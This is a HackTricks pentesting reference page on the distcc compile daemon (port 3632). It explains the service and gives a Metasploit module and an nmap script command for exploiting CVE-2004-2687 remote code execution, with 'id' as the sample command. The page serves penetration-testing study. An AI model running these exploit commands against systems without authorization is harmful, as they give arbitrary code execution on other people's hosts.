HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
3632 - Pentesting distcc
Support HackTricks and get benefits!

Basic Information

Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
Default port: 3632
1
PORT STATE SERVICE
2
3632/tcp open distccd
Copied!

Exploitation

Check if it's vulnerable to CVE-2004-2687 to execute arbitrary code:
1
msf5 > use exploit/unix/misc/distcc_exec
2
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Copied!

Shodan

I don't think shodan detects this service.

Resources

Post created by รlex B (@r1p)
Support HackTricks and get benefits!